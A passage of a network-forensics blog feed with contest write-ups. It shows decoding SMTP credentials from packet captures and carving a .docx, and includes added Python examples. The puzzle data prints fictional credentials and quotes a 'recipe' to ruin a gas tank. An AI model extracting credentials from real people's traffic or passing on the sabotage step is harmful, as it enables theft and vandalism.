recall all the specifics anymore.  &lt;a href="http://www.offenseindepth.com/smtpcat/puzzle2.txt"&gt;Here&lt;/a&gt; is someone else's writeup on how they did it, goes into a bit more detail, but same idea.  
His smtpcat is of course different than mine.&lt;br /&gt;&lt;br /&gt;Update:  (OK, I had some time to run through this for those who may need some more info)&lt;br /&gt;&lt;br /&gt;First let's see what conversations we have going on in evidence02.pcap:&lt;br /&gt;C:\nft&gt;perl pcapcat.pl -r evidence02.pcap&lt;br /&gt;[1] TCP 192.168.1.159:1036 -&gt; 64.12.102.142:587&lt;br /&gt;[2] TCP 192.168.1.159:1038 -&gt; 64.12.102.142:587&lt;br /&gt;&lt;br /&gt;Let's dump each:&lt;br /&gt;C:\nft&gt;perl pcapcat.pl -r evidence02.pcap -w file1.txt -d 1&lt;br /&gt;C:\nft&gt;perl pcapcat.pl -r evidence02.pcap -w file2.txt -d 2&lt;br /&gt;&lt;br /&gt;Pull up each file in Notepad or your favorite text editor and you'll see file1.txt isn't what we want; it is about canceling lunch with someone.  file2.txt, though, appears to have an attachment.  Looking through it we can see the answers to some of our questions and we can see what the attachment is:&lt;br /&gt;------=_NextPart_000_000D_01CA497C.9DEC1E70&lt;br /&gt;Content-Type: application/octet-stream;&lt;br /&gt; name="secretrendezvous.docx"&lt;br /&gt;Content-Transfer-Encoding: base64&lt;br /&gt;Content-Disposition: attachment;&lt;br /&gt; filename="secretrendezvous.docx"&lt;br /&gt;&lt;br /&gt;We could just copy/paste the attachment into a nice web form on Google and get it to spit out the file, but that defeats the purpose of the exercise (though that is what I did initially to get the answers).&lt;br /&gt;&lt;br /&gt;So next we feed it through smtpcat.pl like this:&lt;br /&gt;C:\nft&gt;perl smtpcat.pl -r file2.txt -w dir2&lt;br /&gt;&lt;br /&gt;It will create the directory dir2 if it doesn't already exist and drop the attachments found in file2.txt into it.&lt;br /&gt;&lt;br /&gt;We also get the following output:&lt;br /&gt;Credentials:&lt;br /&gt;username: sneakyg33k@aol.com&lt;br /&gt;password: 558r00lz&lt;br /&gt;&lt;br /&gt;Other info:&lt;br /&gt;From: "Ann Dercover" &lt;sneakyg33k@aol.com&gt;&lt;br /&gt;&lt;br /&gt;To: 
&lt;mistersecretx@aol.com&gt;&lt;br /&gt;Subject: rendezvous&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Attachments and other top level info:&lt;br /&gt;Content-type: multipart/mixed&lt;br /&gt;Effective-type: multipart/mixed&lt;br /&gt;Body-file: NONE&lt;br /&gt;Subject: rendezvous&lt;br /&gt;Num-parts: 2&lt;br /&gt;--&lt;br /&gt;    Content-type: multipart/alternative&lt;br /&gt;    Effective-type: multipart/alternative&lt;br /&gt;    Body-file: NONE&lt;br /&gt;    Num-parts: 2&lt;br /&gt;    --&lt;br /&gt;        Content-type: text/plain&lt;br /&gt;        Effective-type: text/plain&lt;br /&gt;        Body-file: dir2\msg-860-1.txt&lt;br /&gt;        --&lt;br /&gt;        Content-type: text/html&lt;br /&gt;        Effective-type: text/html&lt;br /&gt;        Body-file: dir2\msg-860-2.html&lt;br /&gt;        --&lt;br /&gt;    Content-type: application/octet-stream&lt;br /&gt;    Effective-type: application/octet-stream&lt;br /&gt;    Body-file: dir2\secretrendezvous.docx&lt;br /&gt;    Recommended-filename: secretrendezvous.docx&lt;br /&gt;&lt;br /&gt;We now know her username, password, who the email was from and to, along with the subject, the number of parts and what it created.  Since there were no suggested names for the plain and html parts it made some up for them.&lt;br /&gt;&lt;br /&gt;The username/password were both base64 encoded.  The two types of authentication that we can easily decode are AUTH LOGIN and AUTH PLAIN, both being base64 encoded, just different formats of storing the data.  
smtpcat.pl will handle both, even though only one was needed for this.&lt;br /&gt;&lt;br /&gt;Here is what we have in dir2:&lt;br /&gt; Directory of C:\nft\dir2&lt;br /&gt;&lt;br /&gt;11/28/2009  02:53 PM                87 msg-860-1.txt&lt;br /&gt;11/28/2009  02:53 PM               402 msg-860-2.html&lt;br /&gt;11/28/2009  02:53 PM           207,438 secretrendezvous.docx&lt;br /&gt;&lt;br /&gt;Looking at the .txt or .html files (both contain the same info, one as plain text and one as HTML) Ann asks her sweetheart to bring their fake passport and bathing suit to the attached address.  Guess we need to go look at the .docx file.  &lt;br /&gt;&lt;br /&gt;Opening up the .docx file in OpenOffice we see that it is a picture of Google Maps telling where to meet.  Running an extraction on the .docx file we can go to the word\media directory and find the attached image called image1.png.  Do an md5sum on that file and on the original .docx file to get the MD5s for them.&lt;br /&gt;&lt;br /&gt;Again smtpcat.pl could be cleaned up a bit to add more stuff and be written cleaner, but for what was needed here this worked great.  
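The credential decoding and attachment extraction that smtpcat.pl does, as an added Python example that is not the blog's script: it decodes AUTH LOGIN or AUTH PLAIN (both base64, as noted above), undoes SMTP dot-stuffing, pulls each attachment out of the MIME tree with the standard library and MD5s it. The session it parses is constructed; the addresses, password and attachment bytes are made up and not from the contest capture.

```python
"""Pull the SMTP AUTH credentials and MIME attachments out of a client-side
SMTP conversation dumped to a file (what pcapcat or tcpflow writes). Added
Python example, not the blog's smtpcat.pl; the session below is constructed."""
import base64
import hashlib
from email import message_from_bytes
from email.policy import default

CRLF = b"\r\n"


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def decode_auth(lines):
    """(method, username, password) for AUTH LOGIN or AUTH PLAIN, else None.
    Both are base64, not encryption: LOGIN sends user and password as two
    separate base64 lines, PLAIN one blob laid out as authzid NUL user NUL password."""
    for i, raw in enumerate(lines):
        words = raw.strip().split()
        if len(words) > 1 and words[0].upper() == b"AUTH":
            method = words[1].upper()
            if method == b"LOGIN":
                user = base64.b64decode(lines[i + 1].strip())
                password = base64.b64decode(lines[i + 2].strip())
                return "LOGIN", user.decode("utf-8", "replace"), password.decode("utf-8", "replace")
            if method == b"PLAIN":
                # the blob may ride on the AUTH line itself or follow on the next line
                blob = words[2] if len(words) > 2 else lines[i + 1].strip()
                fields = base64.b64decode(blob).split(b"\x00")
                return "PLAIN", fields[1].decode("utf-8", "replace"), fields[2].decode("utf-8", "replace")
    return None


def extract_message(lines):
    """Raw message the client sent between DATA and the lone '.' terminator,
    with SMTP dot-stuffing undone (a line starting '..' really starts '.')."""
    body, in_data = [], False
    for raw in lines:
        line = raw.rstrip(CRLF)
        if not in_data:
            in_data = line.upper() == b"DATA"
            continue
        if line == b".":
            break
        body.append(line[1:] if line.startswith(b"..") else line)
    return CRLF.join(body) + CRLF


def summarize(session):
    """Credentials, top-level headers and one MD5 per attachment for a session."""
    lines = session.split(CRLF)
    msg = message_from_bytes(extract_message(lines), policy=default)
    attachments = []
    for part in msg.walk():
        name = part.get_filename()
        if name:                                  # only parts that carry a filename
            data = part.get_payload(decode=True)  # undoes the base64 transfer encoding
            attachments.append({"filename": name, "size": len(data), "md5": md5_hex(data)})
    return {"auth": decode_auth(lines), "from": str(msg["From"]), "to": str(msg["To"]),
            "subject": str(msg["Subject"]), "attachments": attachments}


# Constructed client-to-server session: addresses, password and attachment
# bytes are all made up (the attachment merely starts like a zip/.docx).
ATTACHMENT = b"PK\x03\x04" + b"\x00" * 4 + b"constructed, not a real .docx"
BOUNDARY = b"----=_NextPart_constructed"
SAMPLE_SESSION = CRLF.join([
    b"EHLO laptop",
    b"AUTH LOGIN",
    base64.b64encode(b"sender@example.invalid"),
    base64.b64encode(b"s3cretpw"),
    b"DATA",
    b"From: sender@example.invalid",
    b"To: rcpt@example.invalid",
    b"Subject: rendezvous",
    b"MIME-Version: 1.0",
    b'Content-Type: multipart/mixed; boundary="' + BOUNDARY + b'"',
    b"",
    b"--" + BOUNDARY,
    b"Content-Type: text/plain",
    b"",
    b"Bring the attached map.",
    b"..a dot-stuffed line",
    b"--" + BOUNDARY,
    b'Content-Type: application/octet-stream; name="map.docx"',
    b"Content-Transfer-Encoding: base64",
    b'Content-Disposition: attachment; filename="map.docx"',
    b"",
    base64.b64encode(ATTACHMENT),
    b"--" + BOUNDARY + b"--",
    b".",
    b"QUIT",
]) + CRLF
# Same credentials in the AUTH PLAIN form, as one constructed line.
SAMPLE_PLAIN_LINES = [b"AUTH PLAIN " + base64.b64encode(b"\x00sender@example.invalid\x00s3cretpw")]
```

Run summarize() over the one-direction dump of the session; the attachment MD5 it returns is the hash of the decoded bytes, the same value md5sum gives on the file smtpcat.pl writes to disk.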
Using pcapcat.pl worked in this example, but as noted before, it does not take into consideration out of order packets, retransmissions, etc, so something else may be needed in "real life", though I still really like it!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-879058494029449988?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/879058494029449988/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=879058494029449988' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/879058494029449988'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/879058494029449988'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/11/network-forensic-challenge-2-update.html' title='Network Forensic Challenge #2 - update'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-9162422508978756121</id><published>2009-10-30T10:14:00.002-06:00</published><updated>2009-10-30T10:38:00.164-06:00</updated><title type='text'>Yokoso!</title><content type='html'>The &lt;a href="http://www.net-security.org/secworld.php?id=8438"&gt;first&lt;/a&gt; I saw of this was on one of the Twitter posts from someone I follow.  This is a &lt;a href="Yokoso is a project geared toward fingerprinting infrastructure. 
Yokoso will determine what web interfaces are available on a specific network. "&gt;sourceforge&lt;/a&gt; project.&lt;br /&gt;&lt;br /&gt;On a read of the sourceforge page you'll see:&lt;br /&gt;Yokoso is a project geared toward fingerprinting infrastructure. Yokoso will determine what web interfaces are available on a specific network. &lt;br /&gt;&lt;br /&gt;But based on the net-security article it is a bit more.  First it tries to exploit your browser, goes through and finds out what sites you may have admin rights on, and then does some type of fingerprinting.&lt;br /&gt;&lt;br /&gt;I'm going to try to find some time in the next week or two to test this out, if/when I do I'll post back my results.  It looks promising, but anything doing browser exploits makes me nervous.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-9162422508978756121?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/9162422508978756121/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=9162422508978756121' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/9162422508978756121'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/9162422508978756121'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/10/yokoso.html' title='Yokoso!'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-635750181195486463</id><published>2009-10-29T15:46:00.004-06:00</published><updated>2009-10-30T10:06:43.456-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DHCP fingerprint manager'/><category scheme='http://www.blogger.com/atom/ns#' term='dhcp fingerprinting'/><title type='text'>DHCP Fingerprint Manager updated</title><content type='html'>New release of DHCP Fingerprint Manager (1.00.01) released earlier today.  In earlier versions you had to export the data out of wireshark in a text format and it would read that in and DHCP Fingerprint your data, in the latest release it now reads in .pcap files.  &lt;br /&gt;&lt;br /&gt;I've mentioned some of the features of this program before, that I'd love to steal and add into Satori, but I'll probably never get around to it.  I love the statistics feature when it is done!  It also gives you the ability to update the fingerprint data and then reparse the data from the pcap file and get the new fingerprint for the device if it happens to have changed.&lt;br /&gt;&lt;br /&gt;Check it out and give him some feedback on the product when you get a chance.&lt;br /&gt;&lt;br /&gt;Update (note from the author):&lt;br /&gt;Note that open/save handles user data in XML format. 
It contains end-systems and fingerprints (content of both tabs).&lt;br /&gt;The import function allows to get end-systems for DHCP trace (*.txt or *.pcap or *.cap) and to get fingerprints.&lt;br /&gt;Note that fingerprints are "imported" by default when creating a new data file.&lt;br /&gt; &lt;br /&gt;Here is a &lt;a href="http://pagesperso-orange.fr/cycocrew/delphi/DHCPFingerprintManagerSetup.exe"&gt;quick link&lt;/a&gt; to the program.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-635750181195486463?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://pagesperso-orange.fr/cycocrew/delphi/applications.html' title='DHCP Fingerprint Manager updated'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/635750181195486463/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=635750181195486463' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/635750181195486463'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/635750181195486463'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/10/dhcp-fingerprint-manager-updated.html' title='DHCP Fingerprint Manager updated'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-7235342866690019059</id><published>2009-10-24T15:12:00.003-06:00</published><updated>2009-11-28T15:09:17.516-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='network forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='perl'/><category scheme='http://www.blogger.com/atom/ns#' term='forensics contest'/><title type='text'>Network Forensics Challenge #2</title><content type='html'>They are at it again; we barely got the answers for #1 and #2 got put up a few weeks ago.  I did it originally within ~30 mins using the web, Wireshark and a few other local programs on my machine.  But I wanted to stand a chance of actually winning this time, so instead of just sending them the answers I actually started writing a few .exe programs to parse the data out.  I have/had them done and then decided I better do something I was willing to share the source code on, so I wrote out a Perl script.&lt;br /&gt;&lt;br /&gt;Perl is not something I ever work in, have only done it a few times before, so it was a bit painful to do, especially coming from a Pascal background and not a C one!  If statements and eq vs = and other little gotchas killed me today, but after about 4 hours or so I came up with a 258 line .pl file that parses it out nicely.  There is a lot more I could add to it, but since I'm by no means a Perl programmer and my hands are cramping up typing this as it is, it was time for a break and time to call good enough good enough!&lt;br /&gt;&lt;br /&gt;I'll release the script after the deadline if I'm not picked as a finalist and it is added to their site.&lt;br /&gt;&lt;br /&gt;This was another fun project to work on and it forced me to dig into a programming language I should have learned long ago, but never have.  
So always good to expand your knowledge some.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-7235342866690019059?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://forensicscontest.com/' title='Network Forensics Challenge #2'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/7235342866690019059/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=7235342866690019059' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7235342866690019059'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7235342866690019059'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/10/network-forensics-challenge-2.html' title='Network Forensics Challenge #2'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-8869657050207637113</id><published>2009-10-14T10:37:00.002-06:00</published><updated>2009-10-14T10:39:41.905-06:00</updated><title type='text'>Small Linux Devices</title><content type='html'>Just a followup on the Wall-Wart type linux devices, something &lt;a href="http://www.net-security.org/secworld.php?id=8340"&gt;new&lt;/a&gt; came out.&lt;br /&gt;&lt;br /&gt;If you thought the last one was small, then check this out.  
There are advantages to the Wall Wart design (usb to add wireless or a 2nd nic, etc), but if you are just looking at size this thing is great.  Not sure if it is POE or how they power it, didn't look into details.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-8869657050207637113?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/8869657050207637113/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=8869657050207637113' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8869657050207637113'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8869657050207637113'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/10/small-linux-devices.html' title='Small Linux Devices'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-7780897710440811977</id><published>2009-10-07T07:46:00.005-06:00</published><updated>2009-10-07T07:54:34.403-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='telnet'/><category scheme='http://www.blogger.com/atom/ns#' term='sans'/><category scheme='http://www.blogger.com/atom/ns#' term='passive'/><title type='text'>SANS Reading room</title><content type='html'>Not sure how new the article is based on the fact that all referenced material is from 
2002 or before, but &lt;a href="http://www.sans.org/security-resources/idfaq/fingerp_telnet.php"&gt;here&lt;/a&gt; it is.  It is about using Telnet Negotiation Data to passively fingerprint a system.  &lt;br /&gt;&lt;br /&gt;Being that telnet isn't used much anymore, it may be a little dated now, but it popped up in my Google Alerts, so figured I'd at least put it here so I could find it easier in the future if need be.&lt;br /&gt;&lt;br /&gt;While looking around SANS reading room I also came across this &lt;a href="http://www.sans.org/security-resources/idfaq/passive_vuln.php"&gt;article&lt;/a&gt; which also appears to be dated, but still somewhat useful.  It is about using passive fingerprinting to audit and discover network vulnerabilities.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-7780897710440811977?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/7780897710440811977/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=7780897710440811977' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7780897710440811977'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7780897710440811977'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/10/sans-reading-room.html' title='SANS Reading room'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6393541195992133042</id><published>2009-09-26T10:48:00.004-06:00</published><updated>2009-11-28T15:09:41.418-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='network forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='sans'/><category scheme='http://www.blogger.com/atom/ns#' term='networkminer'/><category scheme='http://www.blogger.com/atom/ns#' term='forensics contest'/><category scheme='http://www.blogger.com/atom/ns#' term='satori'/><title type='text'>Network Forensics Contest Results</title><content type='html'>A month or two ago &lt;a href="http://philosecurity.org"&gt;philosecurity.org&lt;/a&gt; started a nice little Network Forensic contest.  It wasn't too hard and wasn't too easy.  It gave me a chance to parse through some traffic and see what was going on.  Then to carve a file out of a packet capture, using some of the SANS 508 stuff I learned awhile back before I picked up my GCFA cert.&lt;br /&gt;&lt;br /&gt;The original puzzle can be found &lt;a href="http://philosecurity.org/2009/08/14/network-forensics-puzzle-contest"&gt;here&lt;/a&gt; and then again &lt;a href="https://blogs.sans.org/computer-forensics/2009/08/19/network-forensics-puzzle-contest/"&gt;here&lt;/a&gt; when SANS decided to sponsor it and give an On-Demand course away for the winner.&lt;br /&gt;&lt;br /&gt;Well happy to say I at least got everything right, though I didn't win, nor was I one of the finalists.  All of the finalists scripted out a way to answer the questions, or had one program that did it all (or most of it).  
The results can be found &lt;a href="http://forensicscontest.com/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Erik Hjelmvik, author of &lt;a href="http://forensicscontest.com/"&gt;NetworkMiner&lt;/a&gt;, who is using some of the TCP and DHCP fingerprinting stuff from Satori, was one of the finalists and implemented some new stuff in 0.89 to become a finalist, though not a semifinalist since it wasn't all scripted out either.  (When I used NetworkMiner to parse it out, it was only version 0.88, Erik hadn't released 0.89 until after I put my submission in).&lt;br /&gt;&lt;br /&gt;From a straight Network Forensics standpoint I understand why they wanted it scripted out, but from understanding how to actually do it I'm glad I didn't depend on an automated program to do it (granted each of the finalists I believe had to write their own programs to do this).  If you understand how to carve the data out then you can do this with pretty much any data; if you depend on a utility to do it, you may have to wait for updates to it if/when things change.&lt;br /&gt;&lt;br /&gt;Ultimately I just wanted to make sure I could do it and am happy that I got it done and answered correctly.  I was more interested in it from a fingerprinting standpoint anyway and spent more of my time on seeing what else was on the network!&lt;br /&gt;&lt;br /&gt;If anyone wants to do it, the puzzle and pcap files are still out there!&lt;br /&gt;&lt;br /&gt;Here was my submission and all my notes (again I was interested in the rest of the network):&lt;br /&gt;&lt;br /&gt;Answers:&lt;br /&gt;&lt;br /&gt;1.  Sec558user1&lt;br /&gt;2.  Here's the secret recipe... I just downloaded it from the file server. Just copy to a thumb drive and you're good to go &amp;gt;:-)&lt;br /&gt;3.  recipe.docx&lt;br /&gt;4.  50 4B 03 04&lt;br /&gt;5.  8350582774E1D4DBE1D61D64C89E0EA1&lt;br /&gt;6.  
Recipe for Disaster:&lt;br /&gt;&lt;br /&gt;1 serving&lt;br /&gt;Ingredients:&lt;br /&gt;4 cups sugar&lt;br /&gt;2 cups water&lt;br /&gt;In a medium saucepan, bring the water to a boil. Add sugar. Stir gently over low heat until sugar is fully dissolved. Remove  the  saucepan from heat.  Allow to cool completely. Pour into gas tank. Repeat as necessary.&lt;br /&gt;&lt;br /&gt;How I got there:&lt;br /&gt;&lt;br /&gt;Tools Used:&lt;br /&gt;Satori - http://myweb.cableone.net/xnih - Passive OS Fingerprinting&lt;br /&gt;NetworkMiner - http://sourceforge.net/projects/networkminer/ - Network Forensic Analysis Tool, used for cookie stuff and a few other sanity checks&lt;br /&gt;FrHed - http://frhed.sourceforge.net/ - used to Hex Edit the file to remove the initial stuff prior to the magic number&lt;br /&gt;Wireshark - http://www.wireshark.org - view and export pcap file&lt;br /&gt;HashGenerator - http://pagesperso-orange.fr/cycocrew/delphi/applications.html - compute hashes&lt;br /&gt;Google of course to find some of the other info&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Writeup:&lt;br /&gt;I started with two programs: Satori, one I wrote geared completely towards passive OS fingerprinting, and NetworkMiner, whose developer I've worked with a little in the past.  Using Satori I mapped out the machines identified in the packet capture and got an initial layout of the network, determining which systems did what on the network.  Then, feeding the capture through NetworkMiner, I was able to get some of the initial clear text information that was going on between clients.  Once I had a better idea of what type of data was in the capture I started picking away at it with Wireshark.&lt;br /&gt;&lt;br /&gt;Knowing Ann's IP it was easy to get started in Wireshark with a simple filter of (ip.host == 192.168.1.158).  With this in place I scanned through the packets for anything out of the ordinary in the hex window.  
Basically I knew there had to be some type of clear text conversation going on due to what NetworkMiner had seen.  We see Ann's computer is talking to 64.12.24.50 (bos-m013a-sdr3.blue.aol.com).  Since it is an AOL server it is probably AIM being used, but I did not verify that.  The information looks to be SSL based on the destination port, but ends up being in clear text.  I assume this was an attempt to get past any egress filtering, but didn't dig into it since that wasn't requested at this time.&lt;br /&gt;&lt;br /&gt;Identifying who she was talking to was fairly simple, and digging into whatever protocol the chat program she was using would have probably been a good idea.  Based on other things I saw she appears to be communicating with Sec558User1.&lt;br /&gt;&lt;br /&gt;Eventually she transfers the file to the other user at computer 192.168.1.159, which appears to be a Windows XP box.  Depending on your environment this may be a dead giveaway that you are having issues.  Looking at the other systems on this network they all appear to be Linux boxes, so a new rogue XP box sticks out like a sore thumb.  Something like PacketFence, which does DHCP fingerprinting, may be useful to block computers like this off their network or at least make it a little harder for them to get a valid IP and use the network.&lt;br /&gt;&lt;br /&gt;In packet 92 we see the beginning of the file transfer, sending the file recipe.docx.&lt;br /&gt;&lt;br /&gt;The rest of the file transfer starts in about packet 109, where we are able to right click on it and do "Follow TCP Stream".  This shows both directions of traffic.  Next we need to go to the bottom and filter by 192.168.1.158 --&gt; 192.168.1.159, getting just the data that Ann's computer is sending to the XP box.  Select Raw and do a Save As.  
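The same cut done in code on the raw stream just saved, as an added Python example that is not the author's hex-editor workflow: it locates the first 50 4B 03 04 (PK) local file header, uses the ZIP end-of-central-directory record to drop any trailer bytes after the archive, verifies the result and MD5s the document and every member (the map image lives under word/media/ in a .docx). The stream bytes are constructed, not the contest capture.

```python
"""Carve a ZIP-based document (.docx) out of a raw one-direction TCP stream
saved from Wireshark's Follow TCP Stream, then hash it and every file inside
it. Added Python example, not the author's tooling; the stream bytes below
are constructed and are not the contest capture."""
import hashlib
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # 50 4B 03 04: first bytes of any zip, .docx included
ZIP_EOCD = b"PK\x05\x06"           # end-of-central-directory record that closes a zip
EOCD_FIXED_LEN = 22                # fixed part of that record; comment length at offset 20


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def carve_zip(stream):
    """Return the first embedded zip archive in stream, or None.
    Start is the first local file header signature (what the writeup searches
    for in a hex editor); end is the end-of-central-directory record plus its
    comment, so any transfer-protocol trailer after the archive is dropped."""
    start = stream.find(ZIP_LOCAL_HEADER)
    if start == -1:
        return None
    eocd = stream.rfind(ZIP_EOCD, start)
    if eocd == -1:
        return None                 # truncated transfer: central directory never arrived
    comment_len = int.from_bytes(stream[eocd + 20:eocd + 22], "little")
    return stream[start:eocd + EOCD_FIXED_LEN + comment_len]


def inspect_docx(data):
    """MD5 of the carved document and of each member, so the embedded map
    image (word/media/... in a .docx) can be hashed without unpacking to disk."""
    archive = zipfile.ZipFile(io.BytesIO(data))
    if archive.testzip() is not None:
        raise ValueError("carved archive failed its CRC check")
    members = {name: md5_hex(archive.read(name)) for name in archive.namelist()}
    return {"docx_md5": md5_hex(data), "members": members}


def build_sample_docx():
    """Constructed stand-in for recipe.docx: a tiny zip with the member names
    a real .docx uses. Fixed timestamps keep the bytes reproducible."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in [
            ("[Content_Types].xml", b"constructed content types"),
            ("word/document.xml", b"constructed document body"),
            ("word/media/image1.png", b"\x89PNG\r\n\x1a\n" + b"constructed image bytes"),
        ]:
            info = zipfile.ZipInfo(name, date_time=(2009, 9, 26, 10, 48, 0))
            info.compress_type = zipfile.ZIP_DEFLATED
            z.writestr(info, body)
    return buf.getvalue()


SAMPLE_DOCX = build_sample_docx()
SAMPLE_IMAGE_MD5 = md5_hex(b"\x89PNG\r\n\x1a\n" + b"constructed image bytes")
# Raw stream as Save As (Raw) would write it: file-transfer chatter before the
# archive and a few trailer bytes after it, both made up for this example.
SAMPLE_STREAM = b"FILE recipe.docx OK\x00\x01" + SAMPLE_DOCX + b"\x00\x00END"

if __name__ == "__main__":
    carved = carve_zip(SAMPLE_STREAM)
    report = inspect_docx(carved)
    print("docx md5:", report["docx_md5"])
    for name, digest in report["members"].items():
        print(f"  {digest}  {name}")
```

Point carve_zip() at the bytes of the raw Save As file instead of SAMPLE_STREAM; a None result means the signature was never seen or the transfer was cut off before the central directory.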
